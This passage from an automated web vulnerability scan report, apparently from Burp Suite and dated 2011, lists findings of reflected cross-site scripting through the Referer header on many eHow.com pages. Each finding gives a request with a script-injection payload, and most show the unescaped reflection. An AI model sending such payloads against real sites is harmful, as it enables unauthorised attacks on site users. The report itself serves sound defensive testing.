The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8838a</script><script>alert(1)</script>04cbc86da1d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /real-estate-and-investment/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8838a</script><script>alert(1)</script>04cbc86da1d

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71175

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Real Estate & Investment - How To Information | e
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "8838a</script><script>alert(1)</script>04cbc86da1d";

       </script>
...[SNIP]...

4.660. http://www.ehow.com/recipes/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/recipes/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75b27</script><script>alert(1)</script>c1855e6bba5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /recipes/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=75b27</script><script>alert(1)</script>c1855e6bba5

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72811

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Recipes - How To Information | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "75b27</script><script>alert(1)</script>c1855e6bba5";

       </script>
...[SNIP]...

4.661. http://www.ehow.com/recreational-activities/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/recreational-activities/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88cc7</script><script>alert(1)</script>f36c82459a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /recreational-activities/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=88cc7</script><script>alert(1)</script>f36c82459a4

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70635

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Recreational Activities - How To Information | eH
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "88cc7</script><script>alert(1)</script>f36c82459a4";

       </script>
...[SNIP]...

4.662. http://www.ehow.com/relationships-and-family/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/relationships-and-family/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c8f9</script><script>alert(1)</script>5616881ca9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /relationships-and-family/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=6c8f9</script><script>alert(1)</script>5616881ca9

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70783

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Relationships & Family - How To Information | eHo
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "6c8f9</script><script>alert(1)</script>5616881ca9";

       </script>
...[SNIP]...

4.663. http://www.ehow.com/search.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/search.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da53</script><script>alert(1)</script>03f82fa2ae7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /search.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4da53</script><script>alert(1)</script>03f82fa2ae7

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: UserView=List; expires=Thu, 02-Feb-2012 15:15:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30878

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title> | eHow Search</title>
       <meta charset="UTF-8" /
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "4da53</script><script>alert(1)</script>03f82fa2ae7";

       </script>
...[SNIP]...

4.664. http://www.ehow.com/share.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/share.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e62b1</script><script>alert(1)</script>18a9920f7ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /share.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e62b1</script><script>alert(1)</script>18a9920f7ad

Response

4.665. http://www.ehow.com/site-map.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/site-map.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 420a6</script><script>alert(1)</script>dd06843fc54 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /site-map.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=420a6</script><script>alert(1)</script>dd06843fc54

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25596

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Sitemap | eHow.com</title>
       <meta charset="UTF-
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "420a6</script><script>alert(1)</script>dd06843fc54";

       </script>
...[SNIP]...

4.666. http://www.ehow.com/sitemap.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/sitemap.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d64e</script><script>alert(1)</script>164ea1f1fab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /sitemap.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=3d64e</script><script>alert(1)</script>164ea1f1fab

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:48 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22043

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title><br /><div><b>Holiday Guides</b></div></title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "3d64e</script><script>alert(1)</script>164ea1f1fab";

       </script>
...[SNIP]...

4.667. http://www.ehow.com/sports/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/sports/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70301</script><script>alert(1)</script>68b2a8e4972 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /sports/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=70301</script><script>alert(1)</script>68b2a8e4972

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:27 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71331

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Sports - How To Information | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "70301</script><script>alert(1)</script>68b2a8e4972";

       </script>
...[SNIP]...

4.668. http://www.ehow.com/terms_use.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/terms_use.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb02e</script><script>alert(1)</script>83c4d78cc01 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /terms_use.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=bb02e</script><script>alert(1)</script>83c4d78cc01

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:05 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73171

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Terms of Use | eHow.com</title>
       <meta charset=
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "bb02e</script><script>alert(1)</script>83c4d78cc01";

       </script>
...[SNIP]...

4.669. http://www.ehow.com/topic_227_take-pictures.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_227_take-pictures.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db9ff</script><script>alert(1)</script>5579f6c3bbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_227_take-pictures.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=db9ff</script><script>alert(1)</script>5579f6c3bbf

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=227; expires=Thu, 02-Feb-2012 15:16:47 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37803

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Take Photos - Basics of Photography | eHow.com
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "db9ff</script><script>alert(1)</script>5579f6c3bbf";

       </script>
...[SNIP]...

4.670. http://www.ehow.com/topic_2488_lose-weight.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_2488_lose-weight.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d67b</script><script>alert(1)</script>a7c5286818 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_2488_lose-weight.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7d67b</script><script>alert(1)</script>a7c5286818

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=2488; expires=Thu, 02-Feb-2012 15:16:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43110

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Lose Weight | eHow.com
</title>
       <meta chars
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "7d67b</script><script>alert(1)</script>a7c5286818";

       </script>
...[SNIP]...

4.671. http://www.ehow.com/topic_253_lose-weight-now.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_253_lose-weight-now.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39b85</script><script>alert(1)</script>997e8d8e83 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_253_lose-weight-now.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=39b85</script><script>alert(1)</script>997e8d8e83

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:02 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=253; expires=Thu, 02-Feb-2012 15:17:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52910

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Lose Weight Now - Weight Loss Diets | eHow.com
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "39b85</script><script>alert(1)</script>997e8d8e83";

       </script>
...[SNIP]...

4.672. http://www.ehow.com/topic_3493_lose-weight-dieting.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3493_lose-weight-dieting.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5651</script><script>alert(1)</script>f5e0a2d1715 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_3493_lose-weight-dieting.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d5651</script><script>alert(1)</script>f5e0a2d1715

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3493; expires=Thu, 02-Feb-2012 15:16:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45321

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Lose Weight Without Dieting | eHow.com
</title
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "d5651</script><script>alert(1)</script>f5e0a2d1715";

       </script>
...[SNIP]...

4.673. http://www.ehow.com/topic_363_winter-sports.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_363_winter-sports.html

Issue detail

